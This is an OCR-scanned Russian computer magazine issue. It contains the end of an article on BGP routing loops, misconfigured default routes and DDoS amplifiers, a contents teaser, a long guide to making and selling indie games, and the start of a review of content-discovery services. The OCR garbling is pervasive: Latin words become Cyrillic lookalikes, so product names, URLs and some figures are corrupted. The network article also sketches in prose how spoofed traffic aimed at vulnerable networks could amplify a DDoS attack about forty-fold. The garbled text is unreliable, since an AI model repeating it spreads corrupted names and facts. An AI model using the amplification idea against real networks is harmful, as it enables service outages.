АС, не вошедших в эту таблицу, что соответствует 10% всех АС 
в мире. Однако аномалии зачастую могут оказывать опосредо- 



АС174 

• Увеличение плеча ййоБ в 17 раз 

• Реіаиіі гоиіе: 25 уязвимых префиксов 

АС3356-АС3549 

• Увеличение плеча 0йо5 в 8 раз 

• ВСР циклы: 12 ргеііхез аКесІесІ 

• ОеІаиІІ гоиіе: 86 уязвимых префиксов 

Рис. 3 
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ванное влияние не только на АС-источник, но и на соседние АС, 
то есть более чем на 80% АС. 

Беда часто не приходит одна. На рис. 3 рассмотрены два Тіег-1 
провайдера из предыдущей таблицы. В случае І_еѵеІЗ было об- 
наружено несколько усилителей 00о5-атак, один из которых по- 
зволяет увеличить плечо в 17 раз, и 25 префиксов с неправильной 
настройкой сИэиІІ гоиіе. В сети Содепі картина выглядит похожей, 
с той разницей, что также были зарегистрированы ВСР-циклы. 

Россия по сетевым аномалиям не идет впереди планеты всей. 
Ошибок в настройке сіе^аиіі гоиіе у нас чуть больше, чем в среднем 
по миру, усилителей ОйоБ-атак чуть меньше. При этом среди них 
есть усилители, которые позволяют увеличить плечо атаки более 
чем в десять раз. Стоит заметить, что ошибки на уровне настройки 
маршрутизаторов могут длиться месяцами, а возможно, и годами 
(наш мониторинг начал работу только весной). ВСР-циклы (рис. 4) 
куда более нестабильны, многие из них завершаются в течение 
нескольких часов, но в статистике мы рассматриваем только те 
циклы, которые длились больше получаса, уже оказав значитель- 
ное влияние на доступность конечных ресурсов. При этом стоит 
заметить, что мы видели циклы маршрутизации ВСР, которые 
были стабильны в течение нескольких недель. 

С момента запуска нашего мониторинга общее количество 
(рис. 5) обнаруженных сетевых аномалий возросло почти на 50%. 
Однако само число сетевых аномалий в каждый момент времени 
оказалось величиной куда более стабильной: за восемь недель ее 
рост составил около 10%. 



НОВЫЕ ПРИКЛЮЧЕНИЯ РОБИН ГУДА 



Мы попытались сделать свою легенду. Мы решили, что будем 
Робин Гудами, только для этого мы не будем грабить богатых. 

И попытались оповещать АС о наличии проблем. Но, к сожалению, 
эффективность этого мероприятия оказалась куда ниже, чем мы 
рассчитывали. Сетевые администраторы отказывались что-либо 
исправлять, даже если они анонсируют уязвимый префикс. В ответ 
на наши сообщения мы получали отписки из разряда «Да, мы анон- 
сируем эту сеть. Проблема в сети нашего клиента, но мы ничего 
сделать не можем. Но если он нарушает правила пользования, то, 
конечно, напишите нам еще один аЬизе гециезі». К чему это при- 
водит? Во-первых, если кто-то раньше думал, что атака на сетевом 
уровне выглядит как Звезда Смерти со злым гением внутри, то на 
самом деле она выглядит куда прозаичней. 

Создается впечатление, что, пока гром не грянет, большинство 
латать сетевые уязвимости не будет. В качестве примера я рассмо- 
трел одну из таких АС с очень «любезной» техподдержкой (рис. 6). 

Понятно, фамилии, имена изменены, но могу сказать, что 
дело происходит на уровне ядра сети АС. У них все хорошо, кроме 
одного. На стыке между ними есть ошибка в настройке (МаиИ 
гоиіе, причем стык трансконтинентальный, а это приводит к тому, 
что пакетживет в этом цикле до четырех секунд. Тем самым если 




отправить в данный цикл некоторый поток трафика, то реально 
занимаемая им полоса увеличится в четыре раза. И к сожалению, 
это не единственная проблема этих магистральных операторов. 

В клиентских сетях А5Х2 более 50 усилителей 00о5-атак, один 
из которых настолько щедр, что увеличивает плечо атаки более 
чем в 350 раз. В среднем мы получаем десятикратное увеличение. 

И если атакующий проставит в сіезііпаііоп ІР эти клиентские сети 
с уязвимостями, а в качестве зоигсе ІР-адреса из блока 2.2.2.0/24, 
то он получит увеличение плеча атаки в 40 раз. Ну а ботнетом, спо- 
собным сгенерировать пару гигабит в секунду, сегодня никого не 
удивишь — что уж говорить о серверах. Что будет в итоге? Скорее 
всего, произойдет исчерпание канала, ВСР-сессия порвется, что 
создаст волну перестроений ВСР-маршрутизации, которая, в свою 
очередь, вызовет динамические циклы В6Р, а это приведет к ча- 
стичной недоступности абсолютно всех клиентских сетей. Видимо, 
только в этот момент техподдержка начнет разбираться, что к чему. 



КАКИЕ ВЫВОДЫ МОЖНО СДЕЛАТЬ? 



Выводы очень простые. Проблемы клиентских сетей — это про- 
блемы владельца АС. Проблемы сетей его поставщиков — это 
тоже проблемы владельца АС. Учитывайте, что сетевые аномалии 
зачастую не видны со стороны АС-источника. Отсюда огромное по- 
желание для операторов — проверяйте свою сеть. Дважды. 

Р. 5. Мы изучаем вопросы сетевых аномалий для прогнозирования 
будущих угроз и векторов развития ОйоБ-атак. У нас есть готовая 
система мониторинга, и мы готовы предоставлять информацию 
о сетевых аномалиях бесплатно. Мы не можем просто публиковать 
эту информацию, поскольку данные могут быть использованы 
злоумышленниками, но мы будем отвечать на запросы технических 
и административных контактов АС, зарегистрированных в РІРЕ. ПЕ 




Рис. 5 



Рис. 6 
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30 страниц на одной полосе. 
Тизер некоторых статей. 
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Ш0ІЕ6АМЕ:ТНЕ5Т0КѴ 

Біеат и другие платформы цифровой 
дистрибуции игр произвели настоящую 
революцию на рынке. Главное ее след- 
ствие — теперь проекты независимых 
разработчиков могут выйти из тени более 
дорогихтайтловотименитыхстудий и 
издателей. И примеров историйуспеха 
на этутему с каждым днем становится все 
больше. Самое интересное, что приду- 
мать новый МіпесгаЙ и заработать тонны 
нефти можешь и лично ты! 

Разработке игр вэтом номере посвящен 
отдельный материал в «Кодинге», а в 
этойстатьеты можешьузнатьвсео пу- 
бликации, продаже и продвижении игр. 
Причем рассказыватьтебе будутсамые 
настоящие инди-разрабы! 




РС20ЫЕ 



Х-МОВИЕ 
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ПОЗНАЕМ ДАО 5ЦВИМЕ ТЕХТ 2 

Этоттекстовый редактор уверенно заво- 
евывает сразу все десктопные платформы 
благодаря функциональности, настраи- 
ваемости иудобству. Пора разобраться 
втом, какего правильно готовить. 
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ЛУЧШИЕ ИЗ ЛУЧШИХ 

В новой рубрике о мобильных 
устройствах мы были просто обязаны 
начатьсобширногообзора тизЫзаѵе 
приложений для АпсІгоісІ и ЮБна 
каждыйдень. 



58 



САМЫЙ УМНЫЙ СМАРТФОН 

Учимандроидофон выполнять любые, 
даже самые странные желания — с помо- 
щью тулзы ТаБкег и среды 5І_4А, позволя- 
ющей автоматизировать любые операции 
на любимом скриптовом языке. 



РНКЕАКІЫС 



ВЗЛОМ 



МАІ.ѴѴАКЕ 
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КОФЕ С МАЛИНОЙ 

Делаем интернет-кофеварку на базе 
любимый ВазрЬеггу Рі. Главное вэтом 
деле — не получить ошибку 41 8. Это значит, 
чтоты пытаешьсясваритькофевчайнике. 
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ВСКРЫТИЕ БОТНЕТА 

Авторы инструмента ЫеІііоЬ любезно 
согласились рассказать о своем 
детищеи реверс-инжиринге 
протоколов обмена данных. 
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КОВЫРЯЕМ БРОНЮ ѴШР0ѴѴ5 

Продолжаем разговор о механизмах 
безопасности ѴѴіпсІоѵѵв. На этотраз речь 
пойдет о сравнительно мал о изучен ной 
системе контроле доступа винды. 
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СОБСТВЕННАЯ ИГРА С НУЛЕВЫМ БЮДЖЕТОМ: 
КАК ЕЕ РАЗРАБОТАТЬ, КАК ПРОДАТЬ И ЗАЧЕМ 
ЭТО ВООБЩЕ НУЖНО : 



Мы предлагаем вашему вниманию текстовый вариант докла- 
да, который представляли в рамках КРИ 2012, а также в школе 
компьютерной графики Зсгеат ЗсЬооІ (Британская высшая 
школа дизайна). 



тобы сделать великую игру, необхо- 
димы три вещи: потрясающая идея, 
опытная команда и куча дене г. 

Это слова Даниэла Вавры — человека, 
в свое время создавшего игру МаЛа, а ныне 
занимающего пост творческого директора сту- 
дии ѴѴагЬогзе. В случае с инди-проектами, как 
правило, нет ни опытной команды, ни денег. 
Что остается? Только идея! 



ПОЧЕМУ СЕЙЧАС ЛУЧШИМ 
МОМЕНТ, ЧТОБЫ РАЗРАБАТЫВАТЬ 




ИНДИ-ИГРЫ' 



Ответ прост — сейчас они «в тренде». Игроки 
обратили внимание на проекты от начинаю- 
щих разработчиков, им нравится в них играть, 
и они готовы платить за них пусть небольшие, 
но деньги. 

Первый шаг в этом направлении был 
сделан в 2003 году, когда компания Ѵаіѵе 
представила сервис Зіеат. Игры начали 
перебираться с полок магазинов в просторы 
интернета, и это здорово повлияло на инди- 
движение. Если раньше игроки не считали 
серьезной игру, пока издатель не упакует 
ее в коробку, то теперь проекты ААА-класса 
стоят на одной виртуальной полке с инди 
в том же 5іеат. Чтобы издавать игры в цифре, 
можно обойтись без крупных бюджетов, и лю- 
бой разработчик может сам выступить в роли 
и|д^те|ія| 



І7 




Интерес к инди подогрел невероятный 
успех Маркуса Перссона с его МіпесгаШ Еще на 
Стадии беты незавершенная игра сделала раз- 
работчиков миллионерами. ВгаісІ, 5ирег Меаі 
Воу — наверняка для вас это не пустые звуки. 

В последнее время растет популярность 
Ыерепбепі батез РезЛѵаІ — ежегодного инди- 
фестиваля, который проводится в рамках бате 
йеѵеіорегз Сопіюгепсе. Фестиваль проходит 
С 1999 года, но если до 2005-го там побеждали 
проекты вроде Ріге Апб йагкпезз или ЗЬаиегесІ 
баіаху, то с 2005-го и дальше гран-при берут до- 
вольно известные игры. бізЬ, йагѵѵіпіа, Сгауоп 
РЬузісз йеіихе — наверняка вы о них слышали. 

Чтобы представить свою игру на ІбР 
в основном зачете, нужно заплатить сумму 
в 95 долларов. Для студентов и школьников 
есть возможность выступить в отдельной но- 
минации совершенно бесплатно, но, учитывая 
количество подаваемых заявок, конкуренция 
там намного выше. 

Есть интересные конкурсы и поменьше 
масштабом. К примеру, І_исІит баге, где раз- 
работчики делают игры на заданную тему 
в сжатые сроки. Среди победителей встреча- 
ются просто отличные работы. 

Российский аналог этого конкурса — 
батіпаіог, который проводится силами аатіп. 
Ш- Там все то же самое, только сроки на раз- 
работку свободнее — дается чуть больше двух 
недель на игру. Если вы хотите попробовать 



свои силы — здесь ваш проект по достоинству 
оценит и прокомментирует постоянное комью- 
нити сайта. 

Еще один аргумент в пользу инди-тренда — 
это разнообразные Іпсііе ВипсІІез. Несколько 
разработчиков объединяются и представляют 
набор из своих игр по очень выгодной цене, 
а игроки дружно поддерживают эту инициа- 
тиву рублем. В результате каждый из разра- 
ботчиков получает крупную сумму наличных и, 
как приятное дополнение, хорошее освещение_ 
игры в прессе. Игроки же получают приятую 
скидку на известные проекты — таким обра- 
зом, от бандлов выигрывают обе стороны. 

Чтобы представить примерный масштаб — 
в ходе продажи ТИе НштіЫе Іпсііе Випсііе V было 
продано 599 003 набора общей стоимостью 
_5 108 509 долларов. По 500-600 тысяч долла- 
ров каждому из участвующих разработчиков 
согласитесь, неплохо. 

Интересное движение началось и на сайте 
Кіскзіагіег, где общими усилиями собирают 
средства на реализацию различных проектов. 
Разработчики дружно зашевелились, когда 
Тим Шейфер разместил там свою новую игру 
боиЫе Ріпе Абѵепіиге в начале 2012 года. Тим 
рассчитывал собрать 400 000 долларов, но 
в итоге получил почти три с половиной милли- 
она. За ним последовали іпХіІе епіегіаіптепі с 
ѴѴазІеІапсІ 2 и біаіпіезз батез с СагтадесИоп: 
РеіпсагпаЛоп. Даже новую часть Ларри про- 
спонсировали! Начинающим разработчикам на 
такой прием рассчитывать не стоит, но неболь- 
шую сумму денег на Кіскзіагіег собрать можно. 
Главное, чтобы был надежный друг в США 
с доступом кАтагоп Раутепіз. Создатели 
Кіскзіагіег обещают снять это ограничение, но 
пока без такого друга ничего не получится. 
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Решительные меры в пользу современных 
инди-разработчиков приняли и в 5іеат. Уже 
в начале сентября Ѵаіѵе одобрила десять 
первых игр на 5іеат ОгеепІідЫ. Пользова- 
тели могут голосовать за понравившиеся 
игры, и лучшие из них появляются на полках 
5іеат наравне с обычным ассортиментом. 
Отправить свою игру на рассмотрение в Біеат 
можно было и раньше, но реально надеяться 
на публикацию могли только победители из- 
вестных конкурсов. 

Последний аргумент касается самих 
игроков. Неспроста ту же Ріа Ыо III дружно 
минусуют на Меіасгіііс — за десять лет разра- 
ботки все новые идеи в игре можно сосчитать 
по пальцам одной руки. Среди игроков, конеч- 
но, есть консерваторы, которым это даже нра- 
вится, ну а те, кто хочет что-нибудь поинтерес- 
нее, скорее всего, станут смотреть в сторону 
новых проектов. И следующие 60 баксов они 
потратят не на одну раскрученную игру, а на 
десяток инди. 



I СДЕЛАЙ САМ I 



«Возьмите в руки камеру, снимите что- 
нибудь. Неважно, насколько мелкое и неле- 
пое, неважно, кто в кадре. Напишите в титрах, 
что вы режиссер. И все — вы режиссер. 
Остается только торговаться за бюджет и го- 
норары» 

Джеймс Кэмерон 

Что нужно сделать, чтобы выпустить собствен- 
ную игру? С чего начать? 

Во-первых, нужна команда разработчиков. 
Для типичной игры потребуются как минимум 
программист и художник. Без программиста 
не будет вообще ничего, а без художника 
можно сделать разве что текстовый годиеііке^ 
Если вы рассчитываете на какое-то продвиже- 
ние проекта в прессе — было бы неплохо взять 
в команду еще и РР-менеджера со знанием 
английского языка. 

Учитывая, что бюджет на разработку игры, 
как правило, нулевой, будущих разработчиков 
стоит искать среди своих друзей. Наве рняка 
у вас есть одаренные знакомые, которые к ак 
раз думают, куда приложить энергию. Одно- 
группник решаетзадачи по программированию 
за десять минут? Знакомая девушка отлично 
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рисует пони, летающих в облаках? Друг лучше 
всех играет блюз? Здорово! Их таланты можно 
вмешать в одном флаконе и посмотреть, что 
из этого получится. 

С командой определились. Теперь стоит 
собраться в одном месте и подумать, как будет 
выглядеть ваша будущая игра. Лучше всего 
запастись бумагой с ручками и записывать все 
идеи, которые рождаются во время мозгового 
штурма. Пиксель-арт и стилизация под ретро? 
Манипуляции со временем? Новый жанр, не 
имеющий аналогов? Все это вполне может 
сработать. Для инди нет никаких запретов, 
более того — чем вычурнее идея, тем больше 
шансов, что вас заметят. Главное — плани- 
руйте реальную игру, на разработку которой у 
вас хватит сил. Если в голову пришла мысль 
сделать ММ0РР6 для всех жителей Земли 
разом — это, конечно, хорошо, воттолько 
даже ВІІ 22 агсІ вряд ли возьмется за игру такого 
масштаба. 

Чтобы трезво рассчитывать силы — лучше 
_сразу договориться про определенные сроки. 
Одного месяца на первую игру вполне должнрі 
хватить. Художник как раз нарисует десяток 
героев и локации, а программистуспеет на- 
писать несложный движок. Энтузиазм имеет 
свойство кончаться, и если на месяц его 
обычно хватает, то позже у кого-то появляют- 
ся новые дела, другой разработчик начинает 
лениться... В итоге игра рискует вообще не 
дожить до запуска. 

В процессе разработки старайтесь показы- 
вать промежуточные версии всем друзьям — 
так вы проверите работоспособность игры 
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на различных компьютерах и сможете лучше 
сбалансировать проект на основе их отзывов. 

На что еще обратить внимание? По возмож- 
ности старайтесь выпустить игру не только на 
РС, но и под Мае и Ыпих. На этих платформах 
есть множество игроков, поддерживающих 
инди, — поделившись с ними игрой, вы 
сможете обрести верных союзников. В связи 
с этим вашему программисту стоит обратить 
внимание на кроссплатформенные движки 
вроде Ііпііу или РІазЬ. 

Также среди вашей потенциальной аудито- 
рии находятся обладатели слабых ноутбуков 
с маленькими экранами. Последние хиты у 
них на компьютере не запускаются, а поиграть 
иногда все-таки хочется. Человек покупает 
инди, которая подходит по системным требо- 
ваниям, но вот сюрприз — разрешения экрана 
1024 х 600 игре оказывается маловато. Если вы 
не хотите читать гневные отзывы в коммента- 
риях к своему проекту, лучше заранее порабо- 
тать над этим и сделать поддержку для самых 
маленьких разрешений экрана. 



РЕКЛАМА СВОИМИ СИЛАМИ I 



«В будущем на рынке останется два вида 
компаний: те, кто вышел в интернет, и те, 
кто вышел из бизнеса» 

Билл Гейтс 

Чтобы рекламировать игру, в первую очередь 
нужно сделать для нее сайт. Сайт — эт о очень 
важное место, куда будут обращаться за 
информацией как пресса, так и игроки. 

Не обязательно сильно заморачиваться с ди- 
зайном — главное, чтобы сайт был информа- 
тивным и понятным. Посетитель должен легко 
найти краткое описание по игре, трейлер и 
набор арта. 

На сайте обязательно должен быть раз- 
мещен пресс-пак. Это логотип, все скриншоты 
и трейлеры по игре, упакованные в одном 
архиве. Не забудьте оставить свои контакты. 
Лучше всего, если это будет именно адрес 
электронной почты, а не отдельная страница 
с формой для связи. Если вы хотите, чтобы 









пресса о вас хорошо отзывалась, хотя бы сде- 
лайте работу журналистам чуточку проще. 

Чтобы держать связь с прессой, нужно 
грамотно готовить и рассылать свои пресс- 
релизы. В идеале стоит обратиться к одному 
из зарубежных РР-агентств — потратив 
несколько сотен долларов, вы получите гра- 
мотную рассылку по своему проекту. Если же 
денег совсем нет — пресс-релизы придется 
писать самим. Вот несколько нюансов: 

1. Пишите грамотно. Если пресс-релиз на 
английском и он содержиткучу ошибок — это 
оченьплохо. 

2. Общайтесь вежливо. «Здравствуйте», «До 
свидания», «Суважением», «Мы ответим 
на все ваши вопросы», «Если вы нехотите 
получатьотнасписьма, мы можемубрать 
ваш е-таіі из нашего списка» — вот в таком 
ключестоитписать. 

Л. Краткость— сестра таланта. Журналист 
вряд л и осилит трехстраничную историю. 
Лучше ограничиться перечислением 
основныхособенностей проекта и кратким 
пересказом сюжета. 

4. Если естьвозможность — предложите рабо- 
чую версию для обзора. Журналистам всегда 
интереснее пощупать проект самим. 

5. Можно использовать графику в оформлении 
письма, но не перегибайте палку. Все лишнее 
собирайте в пресс-паки добавляйте ссылку 
на скачивание в конце письма. 

6. Держитесвязь. Единственное — несо- 
глашайтесьна платные размещения. Такие 
тексты мало кто читает, так что лучше сними 
несвязываться. 

Куда рассылать готовый пресс-релиз? 
Пройдитесь по популярным игровым сайтам и 
загляните в раздел с контактами. Как правило, 
там есть форма для ваших новостей или е-таіі 
для связи. Если игра интересная, а пресс- 
релиз ее здорово преподносит— не сомневай- 
тесь, о ней обязательно напишут. 



I КАК ПОПАСТЬ В МАГАЗИНЫ? I 



Если у вас уже есть рабочая версия игры (же- 
лательно финальная] и запущен промо-сайт, то 
можно переходить к выбору площадки для из- 
дания проекта. Если до этого дня игровой ма- 
газин у вас ассоциировался только со Зіеат — 
вас ждет приятное открытие. На самом деле 
таких магазинов больше десятка, и у всех есть 
своя аудитория. 

Процесс размещения игры практически 
везде идентичен. Для начала вы заполняете 
анкету, где рассказываете о себе, о проекте, 
даете все возможные ссылки на публикации 
о нем и на рабочую версию, чтобы сотрудники 
интернет-магазина сами могли попробовать 
вашу игру. 

Далее возможны два варианта развития 
событий. Первый — ваша игра не понравилась^ 
или не подходит для данного интернет-магази- 
на. Как правило, отказы вежливые, логичные 
и вовсе не обидные. К примеру, на запрос о 
размещении Реіепііоп из одного магазина нам 
ответили: «Игра отличная, прошли с удоволь- 
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ствием, но у нас 80% аудитории — это жен- 
щины за 40, и им интереснее играть в покер с 
собаками». 

Удивительно, но самые грубые отказы при- 
ходят от Зіеат. Если игра не понравилась — 
вы получите короткий текст, который они 
рассылают всем разработчикам под копирку. 

_«Игру не берем. В соответствии с нашей по- 
литикой публикаций, мы не комментируем 
наши решения. Спасибо за понимание». Что им 
не понравилось, да и запускал ли хоть кто-то в 
Ѵаіѵе ваше детище — остается только гадать. 

В интернете можно найти историю, как 
одна компания посылала свою игру в 5іеат и 
получила отказ. Они не стали унывать — на- 
ладили контакте издателем, выпустили игру 
в коробках и неплохо заработали на продажах. 
После этого они еще раз обратились в Зіеат 
с уже раскрученным проектом.... И получили 
слово в слово то же письмо в ответ. Воттакой 
Зіеат непреклонный. 

Второй вариант — позитивный. Если игра 
понравилась, то вам дают зеленый свет. После 
это го нужно подписать контракт, где обговари- 
ваются все условия, и оформить страницу игры 
в магазине. 

С контрактом не возникает особых про- 
блем 4^вы просто печатаете его на принтере, 
подписываете, сканируете подписанную 
версию и отправляете по е-таіі. В ответ 
приходит новая версия уже с двумя подпися- 
ми — с вашей стороны и со стороны магазина. 
Связываться с бумажной почтой не требуется, 
и это радует. 

В большинстве случаев все права на игру 
остаются за разработчиком и никакой экс- 
клюзивности от вас не требуют. Поместив 
игру в одном магазине, вы можете послать 
ее еще в десять и собирать общую прибыль. 
Главный нюанс связан с оплатой — в магазине 
Оезига, к примеру, минимальная сумма пере- 
вода составляет 500 долларов. Пока продажи 
не перевалят за эту черту — никаких денег вы 
не получите. Если проекты не очень раскручен- 



ные — вполне возможно, вы выпустите две или 
даже три игры, прежде чем наберете нужную 
сумму. Также не забывайте о процентах, кото- 
рые магазин и РауРаІ забирают себе. Как пра- 
вило, чуть больше 30% уходят «мимо кассы». 

Начинающему инди-разработчику мы реко- 
мендуем обратить внимание на две площадки: 
Оезига и ІпсІіеѴапіа. Первая специализируется 
на инди-проектах и бесплат ных мо д ах !, п о- 
этому у нее уже есть подходящая аудитория. 
Также у Оезига есть неплохой клиент по типу 
Зіеат'овского, но, увы, из версии в версию в нем 
остаются несколько досадных ошибок. Скачи- 
вание игр иногда подвисает на 99 процентах, 
и раздосадованные игроки тут же начинают де- 
литься эмоциями в комментариях к вашей игре. 
Одному из наших проектов — Іппег йгеат — 
Оезига вообще сорвали запуск. Первые 24 часа 
скачанная игра в принципе не запускалась 
из-за ошибки администратора. Как результат — 
около тысячи человек не смогли в нее поиграть, 
а часть из них своими голосами быстро отправи- 
ли рейтинг в сторону единицы. 

1_Э[по, конечно, печально, но все равно Оезига 
остается одним из лучших аналогов Зіеат, 
и мы не перестаем ее рекомендовать. 

Второй магазин — ІпсІіеѴапіа обходится 
без отдельного клиента и в целом выглядит 
проще Оезига, но у него есть пара весомых 
плюсов для разработчиков. Создатели сервиса 
сами являются инди-разработчиками — это 
компания Аііепігар, авторы таких игр, как 
СарзігесІ и ІЧехиіг. Им отлично знакомы про- 
блемы инди, поэтому с помощью ІпсІіеѴапіашх 
стараются решать. Во-первых, этот магазин 
вообще не берет проценты с продаж. Все 
деньги за вычетом налога РауРаІ ( 5 % + 0, 0 5 
доллара) в полном объеме попадают к вам в 
кошелек. Перевод происходит мгновенно — 
как только игрок оплатил покупку, деньги тут 
же у вас на счету. 

Во-вторых, здесь можно по-разному играть 
с ценами. Одна из доступных опций ^«за- 
плати, сколько хочешь». Если вы ей восполь- 
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зуетесь,_то игроки смогут сами выбирать цену. 
Можно разрешить им скачивать игру бес- 
платно либо поставить минимальный платеж 
в 1 доллар. В этом случае многие заплатяттот 
самый доллар, однако встречаются и игроки, 
которые переводят сумму в 4-5 раз больше 
полной стоимости игры. 

Вообще, и на Резита, и на ЫіеѴапіа ча- 
стенько появляются оригинальные проеюъщ ; . 
практически не освещенные в прессе. Есть 
смысл туда периодически заглядывать, когда 
обычные игры успели поднадоесть. 

Повторимся, можно рассылать сівой про- 
ект хоть во все магазины сразу, но от этого 
не выиграют ни игроки, которым удобнее 
хранить всю свою коллекцию в одном месте, 

ни вы сами, только потратите кучу временш 

подписывая контракты. Если вашему проекту 
обещают хорошую рекламу, центральное 
место на витрине и всевозможную поддерж- 
ку — тогда смысл подумать есть, но, публикуя 
игру на обычных условиях, сложно на что-то 
рассчитывать. Зато когда игра уже вышла и вы 
решили подправить ошибки, выпустив патч, 
загружать его на каждый из 10 магазинов — 
это целая история. Где-то файлы передаются 
через веб-интерфейс, где-то — через отд ел ь- 
ную программу. В одном магазине его одобрят 
уже завтра, а на другом только через неделю. 
Такая головная боль — вам оно надо? 

Отдельного упоминания заслуживает 
НитЫе Зіоге — зачатки интеркеінмагазина, 
которые можно обнаружить в недрах сайта 
НІВ. С его помощью можно приобрести неко- 
торые игры из бандлов, сюда же порой ведут 
ссылки с виджетов на сайтах разработчиков. 
Есть вероятность, что когда-нибудь этот 
проект заработает в полную силу, но пока его 
будущее туманно. Вообще, странно продавать 
Зіеат-ключи в обход самого Зіеат — полу- 
чается этакий магазин-зеркало. Есть ли 
смы сл? 

Если интересно, как выглядит НитЫе 
Зіоге — вот страничка с игрой ВІТ.ТРІР РЬІ N N ЕР: 
ЬитЬіеЬипЬІе.сот/^оге/ргасіисІ/ЬіЦсіргиппег . 



Отдельное слово нужно сказать про схему 
АІрЬа (шпсііпд, которая была использована 
в случае с МіпесгаН. Идея в том, что еще на 
хггадии разработки игрокам предлагают пред- 
заказ продукта с возможностью попробовать 
ранние альфа-версии прямо сейчас. Схема 
получила распространение на различных 
бандлах, проектах с Кіскзіагіег, а на йезига 
даже есть отдельный раздел для таких игр. 

АІрЬа (ипсііпд выгодна разработчикам, так 
как позволяет заработать еще до выхода игры. 
Увы, но часть таких проектов так и не были 
закончены, поэтому игроки относятся с подо- 
зрением. Так что, если вы хотите попробовать 
это, лучше сразу иметь на руках работающую 
версию для игроков, а также вести блог раз- 
работки с постоянными обновлениями. 



кеутЫ опта ТімМ 




ВОЗЬМИТЕ НАС С СОБОЙ 



Ы 1=Г 



Через него же продают и альфа-верию Ѵохаігоп, 
которая все еще находится в разработке: 
ѵѵѵѵѵѵ.ІехаЫІіе.сотА/охаІгоп.рИр . 



Если вы хотите поучаствовать в какой-нибудь 
акции вроде инди-бандла или специальной 
распродажи, то внимательно следите за игро- 
выми анонсами. Кактолько вы увидели, что 
кто-то планирует подходящее мероприятие, — 
тутже пишите им и предлагайте свой проект. 

Из собственного опыта — нам удалось по- 
участвовать в акции Весаизе ѴѴе Мау, которая 
проходила в мае — июне этого года. Идея в 
том, что инди-разработчики снижали цены 
на свои игры просто потому, что они могут это 
сделать и не зависят от издателей. По итогам 
акции мы наблюдали подъем в продажах, но 
не такой, каку хедлайнеров распродажи. Тем 
не менее подобный опыт можно назвать по- 
ложительным. 

Если вы хотите поучаствовать в инди-банд- 
ле, то тут многое зависит от самой игры. Если 
посмотреть на популярные бандлы, то больше 
шансов у мультиплатформенного проекта, 
доступного в виде йРМ-Ргее версии и 5іеат/ 
йезига ключей. 

Существуют бандлы, которыми занимаются 
издатели. Если ваша игра понравится — вы 
получите предложение на издание проекта с 
последующим участием в бандле. Сохранить 
верность инди или подписать этот контракт — 
решать только вам. 
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...РРОРІТ? 






Что в итоге? Заработать миллионы на первой 
игре проблематично, так что с ходу рассчиты- 
вать на славу КІоісІТа не стоит. Тем более для 
него МіпесгаЙ был далеко не первой игрой. 
Какое-то количество продажу первого проекта 
будет, но деньги тут далеко не главное. 

Самое ценное, что вы получите, — опыт. 
Одно дело прочитать, как описывают процесс 
другие люди, и совсем другое — попробовать 
на себе. Если вы не остановитесь, уже вторая 
игра окажется на голову выше. Вместо того 
чтобы разбираться с техническими вопросами, 
вы потратите больше сил на саму игру. 

Да и чувство, что проект, который вы 
создали, кому-то нравится, здорово помога- 
ет. Если вы еще не видели Іпсііе бате: ТЬе 
Моѵіе — обязательно посмотрите. Этот фильм 
отлично передает ощущения разработчиков 
насчет всего, что касается их игр. ВгаісІ, Зирег 
Меаі Воу или ваша собственная игра — не 
имеет значения. Накал страстей будет одина- 
ковым. и-и 



ѴѴѴШ 



КЕТЕМТЮМ — ПЕРВАЯ ИГРА 50МЕТІМЕ5 УОУ 



Наша первая игра Пе*еп*іоп — это не- 
большой арт-проект, который проходит- 
ся от начала и до конца всего за десять 
минут. Мы постарались, чтобы игрок за 
эти минуты смог получить какие-то но^_ 
вые и необычные ощущения, и, если ве- 
рить обзорам в прессе, нам это удалось. 
В Реіепііоп мы собрали необычный жанр 
(интерактивный фотоальбом), больше 
двух сотен обработанных фотографий 
из личных альбомов и атмосферный 



саундтрек, который был написан еще до 
начала разработки, но хорошо вписался 
в общую картину. Чуть больше месяца 
заняла основная часть разработки, 
еще пара месяцев ушли на перевод и 
рекламу игры. 

Один из самых сложных моментов 
разработки был в августе 2011-го, когда 
в 5іеат неожиданно вышла Тгаита. 

У Тгаита с Пеіепііоп практически оди- 
наковые завязки, да и опираются обе 



игры на фотографии. Было очевидно, 
что про это сходство напишет в своей 
рецензии каждый второй журналист. 

И если Тгаита в августе уже выпусти- 
ли, то Реіепііоп еще только находи- 
лась в процессе разработки — так 
ведь и в плагиате могут обвинить! Тем 
не менее мы смогли собраться с силами 
и довести игру до релиза. Мы слишком 
верили в проект, чтобы воттак взять 
и отменить его. 



• СайтБотеіітез 
Ѵои: 

вѵои.сот: 

• наша первая игра 
Кеіепііоп в магазине 
Резига: ѵттсіе^ига. 

а /аатез/геіеп- 

гТ 
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РС20ЫЕ 



Игорь Антонов (апІопоѵ.ідог.кНѵйдтаіІ.сот) 



Информация — это сила, и с этим утверждением вряд ли поспоришь. 
Каждый день мы пропускаем через себя мегабайты полезного контента, 
разгребая в боодіе Реабег многочисленные подписки на любимые сайты 
и блоги. Протокол Р55 вкупе с мощнейшим агрегатором в лице боодіе 
Реабег здорово выручают, но в современных реалиях их возможностей, 
увы, не хватает. Хочется получать свежую информацию и при этом не 
думать, есть ли у тебя подписка на соответствующий поток. Решением 
этой проблемы уже давно озадачились многочисленные разработчики, 
и сегодня мы можем сравнить и протестировать автоматизированных 
кулинаров экзотической кухни с именем «Контент». 

Читаем 
с умом 



ЗАПРАВЛЯЕМСЯ 
КОНТЕНТОМ 
ПО ПОЛНОЙ 




КАК МЫ ОЦЕНИВАЛИ СЕРВИСЫ 



Все рассмотренные в статье веб-сервисы мы оценивали по нескольким 
критериям: свежесть найденного контента, наличие контента на русском 
языке, доступность приложений для ІОБ/Апсі гоісі, возможность пользо- 
ваться сервисом через веб, интеграция с боодіе Веасіег и внешний вид. 
Критерий «Интересность контента» рассчитывался на основании матери- 
алов, непосредственно связанных с ИТ. Параметр «Свежесть материалов» 
оценивался на примере актуальности новостей. Зачастую сервисы пред- 
лагали к чтению «свежие» новости месячной давности. 




Читаем с умом 



КУЛИНАРЫ КОНТЕНТА 



ЗІитЫеІІроп 

зІитЫеироп.сот 




При вступлении в ряды стамблеров (пользователь сервиса БііітЫеІІроп) требуется 
выбрать одну или несколько категорий, характеризующих твои интересы. После 
этого поиск свежего контента сведется к нажатию одной-единственной пимпы 
«БіштіЫе!». Эффект подачи контента можно сравнить с переключением телевизи- 
онных каналов. Один щелчок — и загружается новая страница, соответствующая 
интересам, указанным при регистрации. Весь контент ВіитЫеІІроп черпает в 
первую очередь от самих пользователей сервиса. Пользователи смотрят/добавляют 
